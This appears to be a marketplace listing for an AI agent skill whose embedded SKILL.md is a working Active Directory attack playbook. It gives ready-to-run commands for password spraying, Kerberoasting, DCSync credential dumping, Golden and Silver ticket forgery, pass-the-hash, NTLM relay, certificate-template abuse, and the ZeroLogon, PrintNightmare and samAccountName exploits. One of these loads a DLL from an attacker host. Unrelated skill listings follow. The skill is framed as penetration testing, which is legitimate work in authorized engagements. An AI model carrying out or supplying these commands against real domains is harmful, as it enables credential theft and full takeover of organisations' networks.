active-directory-attacks
This skill should be used when the user asks to "attack Active Directory", "exploit AD", "Kerberoasting", "DCSync", "pass-the-hash", "BloodHound enumeration", "Golden Ticket", "Silver Ticket", "AS-REP roasting", "NTLM relay", or needs guidance on Windows domain penetration testing.
Best use case
active-directory-attacks is best used when you need a repeatable AI agent workflow instead of a one-off prompt. It is especially useful for teams working in multi. This skill should be used when the user asks to "attack Active Directory", "exploit AD", "Kerberoasting", "DCSync", "pass-the-hash", "BloodHound enumeration", "Golden Ticket", "Silver Ticket", "AS-REP roasting", "NTLM relay", or needs guidance on Windows domain penetration testing.
This skill should be used when the user asks to "attack Active Directory", "exploit AD", "Kerberoasting", "DCSync", "pass-the-hash", "BloodHound enumeration", "Golden Ticket", "Silver Ticket", "AS-REP roasting", "NTLM relay", or needs guidance on Windows domain penetration testing.
Users should expect a more consistent workflow output, faster repeated execution, and less time spent rewriting prompts from scratch.
Practical example
Example input
Use the "active-directory-attacks" skill to help with this workflow task. Context: This skill should be used when the user asks to "attack Active Directory", "exploit AD", "Kerberoasting", "DCSync", "pass-the-hash", "BloodHound enumeration", "Golden Ticket", "Silver Ticket", "AS-REP roasting", "NTLM relay", or needs guidance on Windows domain penetration testing.
Example output
A structured workflow result with clearer steps, more consistent formatting, and an output that is easier to reuse in the next run.
When to use this skill
- Use this skill when you want a reusable workflow rather than writing the same prompt again and again.
When not to use this skill
- Do not use this when you only need a one-off answer and do not need a reusable workflow.
- Do not use it if you cannot install or maintain the related files, repository context, or supporting tools.
Installation
Claude Code / Cursor / Codex
Manual Installation
- Download SKILL.md from GitHub
- Place it in
.claude/skills/active-directory-attacks/SKILL.mdinside your project - Restart your AI agent — it will auto-discover the skill
How active-directory-attacks Compares
| Feature / Agent | active-directory-attacks | Standard Approach |
|---|---|---|
| Platform Support | Not specified | Limited / Varies |
| Context Awareness | High | Baseline |
| Installation Complexity | Unknown | N/A |
Frequently Asked Questions
What does this skill do?
This skill should be used when the user asks to "attack Active Directory", "exploit AD", "Kerberoasting", "DCSync", "pass-the-hash", "BloodHound enumeration", "Golden Ticket", "Silver Ticket", "AS-REP roasting", "NTLM relay", or needs guidance on Windows domain penetration testing.
Where can I find the source code?
You can find the source code on GitHub using the link provided at the top of the page.
SKILL.md Source
# Active Directory Attacks ## Purpose Provide comprehensive techniques for attacking Microsoft Active Directory environments. Covers reconnaissance, credential harvesting, Kerberos attacks, lateral movement, privilege escalation, and domain dominance for red team operations and penetration testing. ## Inputs/Prerequisites - Kali Linux or Windows attack platform - Domain user credentials (for most attacks) - Network access to Domain Controller - Tools: Impacket, Mimikatz, BloodHound, Rubeus, CrackMapExec ## Outputs/Deliverables - Domain enumeration data - Extracted credentials and hashes - Kerberos tickets for impersonation - Domain Administrator access - Persistent access mechanisms --- ## Essential Tools | Tool | Purpose | |------|---------| | BloodHound | AD attack path visualization | | Impacket | Python AD attack tools | | Mimikatz | Credential extraction | | Rubeus | Kerberos attacks | | CrackMapExec | Network exploitation | | PowerView | AD enumeration | | Responder | LLMNR/NBT-NS poisoning | --- ## Core Workflow ### Step 1: Kerberos Clock Sync Kerberos requires clock synchronization (±5 minutes): ```bash # Detect clock skew nmap -sT 10.10.10.10 -p445 --script smb2-time # Fix clock on Linux sudo date -s "14 APR 2024 18:25:16" # Fix clock on Windows net time /domain /set # Fake clock without changing system time faketime -f '+8h' <command> ``` ### Step 2: AD Reconnaissance with BloodHound ```bash # Start BloodHound neo4j console bloodhound --no-sandbox # Collect data with SharpHound .\SharpHound.exe -c All .\SharpHound.exe -c All --ldapusername user --ldappassword pass # Python collector (from Linux) bloodhound-python -u 'user' -p 'password' -d domain.local -ns 10.10.10.10 -c all ``` ### Step 3: PowerView Enumeration ```powershell # Get domain info Get-NetDomain Get-DomainSID Get-NetDomainController # Enumerate users Get-NetUser Get-NetUser -SamAccountName targetuser Get-UserProperty -Properties pwdlastset # Enumerate groups Get-NetGroupMember -GroupName "Domain Admins" Get-DomainGroup -Identity "Domain Admins" | Select-Object -ExpandProperty Member # Find local admin access Find-LocalAdminAccess -Verbose # User hunting Invoke-UserHunter Invoke-UserHunter -Stealth ``` --- ## Credential Attacks ### Password Spraying ```bash # Using kerbrute ./kerbrute passwordspray -d domain.local --dc 10.10.10.10 users.txt Password123 # Using CrackMapExec crackmapexec smb 10.10.10.10 -u users.txt -p 'Password123' --continue-on-success ``` ### Kerberoasting Extract service account TGS tickets and crack offline: ```bash # Impacket GetUserSPNs.py domain.local/user:password -dc-ip 10.10.10.10 -request -outputfile hashes.txt # Rubeus .\Rubeus.exe kerberoast /outfile:hashes.txt # CrackMapExec crackmapexec ldap 10.10.10.10 -u user -p password --kerberoast output.txt # Crack with hashcat hashcat -m 13100 hashes.txt rockyou.txt ``` ### AS-REP Roasting Target accounts with "Do not require Kerberos preauthentication": ```bash # Impacket GetNPUsers.py domain.local/ -usersfile users.txt -dc-ip 10.10.10.10 -format hashcat # Rubeus .\Rubeus.exe asreproast /format:hashcat /outfile:hashes.txt # Crack with hashcat hashcat -m 18200 hashes.txt rockyou.txt ``` ### DCSync Attack Extract credentials directly from DC (requires Replicating Directory Changes rights): ```bash # Impacket secretsdump.py domain.local/admin:password@10.10.10.10 -just-dc-user krbtgt # Mimikatz lsadump::dcsync /domain:domain.local /user:krbtgt lsadump::dcsync /domain:domain.local /user:Administrator ``` --- ## Kerberos Ticket Attacks ### Pass-the-Ticket (Golden Ticket) Forge TGT with krbtgt hash for any user: ```powershell # Get krbtgt hash via DCSync first # Mimikatz - Create Golden Ticket kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-xxx /krbtgt:HASH /id:500 /ptt # Impacket ticketer.py -nthash KRBTGT_HASH -domain-sid S-1-5-21-xxx -domain domain.local Administrator export KRB5CCNAME=Administrator.ccache psexec.py -k -no-pass domain.local/Administrator@dc.domain.local ``` ### Silver Ticket Forge TGS for specific service: ```powershell # Mimikatz kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-xxx /target:server.domain.local /service:cifs /rc4:SERVICE_HASH /ptt ``` ### Pass-the-Hash ```bash # Impacket psexec.py domain.local/Administrator@10.10.10.10 -hashes :NTHASH wmiexec.py domain.local/Administrator@10.10.10.10 -hashes :NTHASH smbexec.py domain.local/Administrator@10.10.10.10 -hashes :NTHASH # CrackMapExec crackmapexec smb 10.10.10.10 -u Administrator -H NTHASH -d domain.local crackmapexec smb 10.10.10.10 -u Administrator -H NTHASH --local-auth ``` ### OverPass-the-Hash Convert NTLM hash to Kerberos ticket: ```bash # Impacket getTGT.py domain.local/user -hashes :NTHASH export KRB5CCNAME=user.ccache # Rubeus .\Rubeus.exe asktgt /user:user /rc4:NTHASH /ptt ``` --- ## NTLM Relay Attacks ### Responder + ntlmrelayx ```bash # Start Responder (disable SMB/HTTP for relay) responder -I eth0 -wrf # Start relay ntlmrelayx.py -tf targets.txt -smb2support # LDAP relay for delegation attack ntlmrelayx.py -t ldaps://dc.domain.local -wh attacker-wpad --delegate-access ``` ### SMB Signing Check ```bash crackmapexec smb 10.10.10.0/24 --gen-relay-list targets.txt ``` --- ## Certificate Services Attacks (AD CS) ### ESC1 - Misconfigured Templates ```bash # Find vulnerable templates certipy find -u user@domain.local -p password -dc-ip 10.10.10.10 # Exploit ESC1 certipy req -u user@domain.local -p password -ca CA-NAME -target dc.domain.local -template VulnTemplate -upn administrator@domain.local # Authenticate with certificate certipy auth -pfx administrator.pfx -dc-ip 10.10.10.10 ``` ### ESC8 - Web Enrollment Relay ```bash ntlmrelayx.py -t http://ca.domain.local/certsrv/certfnsh.asp -smb2support --adcs --template DomainController ``` --- ## Critical CVEs ### ZeroLogon (CVE-2020-1472) ```bash # Check vulnerability crackmapexec smb 10.10.10.10 -u '' -p '' -M zerologon # Exploit python3 cve-2020-1472-exploit.py DC01 10.10.10.10 # Extract hashes secretsdump.py -just-dc domain.local/DC01\$@10.10.10.10 -no-pass # Restore password (important!) python3 restorepassword.py domain.local/DC01@DC01 -target-ip 10.10.10.10 -hexpass HEXPASSWORD ``` ### PrintNightmare (CVE-2021-1675) ```bash # Check for vulnerability rpcdump.py @10.10.10.10 | grep 'MS-RPRN' # Exploit (requires hosting malicious DLL) python3 CVE-2021-1675.py domain.local/user:pass@10.10.10.10 '\\attacker\share\evil.dll' ``` ### samAccountName Spoofing (CVE-2021-42278/42287) ```bash # Automated exploitation python3 sam_the_admin.py "domain.local/user:password" -dc-ip 10.10.10.10 -shell ``` --- ## Quick Reference | Attack | Tool | Command | |--------|------|---------| | Kerberoast | Impacket | `GetUserSPNs.py domain/user:pass -request` | | AS-REP Roast | Impacket | `GetNPUsers.py domain/ -usersfile users.txt` | | DCSync | secretsdump | `secretsdump.py domain/admin:pass@DC` | | Pass-the-Hash | psexec | `psexec.py domain/user@target -hashes :HASH` | | Golden Ticket | Mimikatz | `kerberos::golden /user:Admin /krbtgt:HASH` | | Spray | kerbrute | `kerbrute passwordspray -d domain users.txt Pass` | --- ## Constraints **Must:** - Synchronize time with DC before Kerberos attacks - Have valid domain credentials for most attacks - Document all compromised accounts **Must Not:** - Lock out accounts with excessive password spraying - Modify production AD objects without approval - Leave Golden Tickets without documentation **Should:** - Run BloodHound for attack path discovery - Check for SMB signing before relay attacks - Verify patch levels for CVE exploitation --- ## Examples ### Example 1: Domain Compromise via Kerberoasting ```bash # 1. Find service accounts with SPNs GetUserSPNs.py domain.local/lowpriv:password -dc-ip 10.10.10.10 # 2. Request TGS tickets GetUserSPNs.py domain.local/lowpriv:password -dc-ip 10.10.10.10 -request -outputfile tgs.txt # 3. Crack tickets hashcat -m 13100 tgs.txt rockyou.txt # 4. Use cracked service account psexec.py domain.local/svc_admin:CrackedPassword@10.10.10.10 ``` ### Example 2: NTLM Relay to LDAP ```bash # 1. Start relay targeting LDAP ntlmrelayx.py -t ldaps://dc.domain.local --delegate-access # 2. Trigger authentication (e.g., via PrinterBug) python3 printerbug.py domain.local/user:pass@target 10.10.10.12 # 3. Use created machine account for RBCD attack ``` --- ## Troubleshooting | Issue | Solution | |-------|----------| | Clock skew too great | Sync time with DC or use faketime | | Kerberoasting returns empty | No service accounts with SPNs | | DCSync access denied | Need Replicating Directory Changes rights | | NTLM relay fails | Check SMB signing, try LDAP target | | BloodHound empty | Verify collector ran with correct creds | --- ## Additional Resources For advanced techniques including delegation attacks, GPO abuse, RODC attacks, SCCM/WSUS deployment, ADCS exploitation, trust relationships, and Linux AD integration, see [references/advanced-attacks.md](references/advanced-attacks.md).
Related Skills
interactive-portfolio
Expert in building portfolios that actually land jobs and clients - not just showing work, but creating memorable experiences. Covers developer portfolios, designer portfolios, creative portfolios, and portfolios that convert visitors into opportunities. Use when: portfolio, personal website, showcase work, developer portfolio, designer portfolio.
activecampaign-automation
Automate ActiveCampaign tasks via Rube MCP (Composio): manage contacts, tags, list subscriptions, automation enrollment, and tasks. Always search tools first for current schemas.
workflow-interactive-dev
用于开发 FastGPT 工作流中的交互响应。详细说明了交互节点的架构、开发流程和需要修改的文件。
when-gathering-requirements-use-interactive-planner
Use Claude Code's AskUserQuestion tool to gather comprehensive requirements through structured multi-select questions.
interactive-planner
Use Claude Code's interactive question tool to gather comprehensive requirements through structured multi-select questions
plan-directory
Create or update a structured plan directory with a master PLAN.md index and numbered task files (001-*.md). Each task file includes goal, dependencies, scope, checklist, tests, and completion criteria. Use when scaffolding a repeatable project plan in markdown, especially when the user wants a master index plus per-task files with checkboxes that are checked off as work completes.
azure-quotas
Check/manage Azure quotas and usage across providers. For deployment planning, capacity validation, region selection. WHEN: "check quotas", "service limits", "current usage", "request quota increase", "quota exceeded", "validate capacity", "regional availability", "provisioning limits", "vCPU limit", "how many vCPUs available in my subscription".
raindrop-io
Manage Raindrop.io bookmarks with AI assistance. Save and organize bookmarks, search your collection, manage reading lists, and organize research materials. Use when working with bookmarks, web research, reading lists, or when user mentions Raindrop.io.
zlibrary-to-notebooklm
自动从 Z-Library 下载书籍并上传到 Google NotebookLM。支持 PDF/EPUB 格式,自动转换,一键创建知识库。
discover-skills
当你发现当前可用的技能都不够合适(或用户明确要求你寻找技能)时使用。本技能会基于任务目标和约束,给出一份精简的候选技能清单,帮助你选出最适配当前任务的技能。
web-performance-seo
Fix PageSpeed Insights/Lighthouse accessibility "!" errors caused by contrast audit failures (CSS filters, OKLCH/OKLAB, low opacity, gradient text, image backgrounds). Use for accessibility-driven SEO/performance debugging and remediation.
project-to-obsidian
将代码项目转换为 Obsidian 知识库。当用户提到 obsidian、项目文档、知识库、分析项目、转换项目 时激活。 【激活后必须执行】: 1. 先完整阅读本 SKILL.md 文件 2. 理解 AI 写入规则(默认到 00_Inbox/AI/、追加式、统一 Schema) 3. 执行 STEP 0: 使用 AskUserQuestion 询问用户确认 4. 用户确认后才开始 STEP 1 项目扫描 5. 严格按 STEP 0 → 1 → 2 → 3 → 4 顺序执行 【禁止行为】: - 禁止不读 SKILL.md 就开始分析项目 - 禁止跳过 STEP 0 用户确认 - 禁止直接在 30_Resources 创建(先到 00_Inbox/AI/) - 禁止自作主张决定输出位置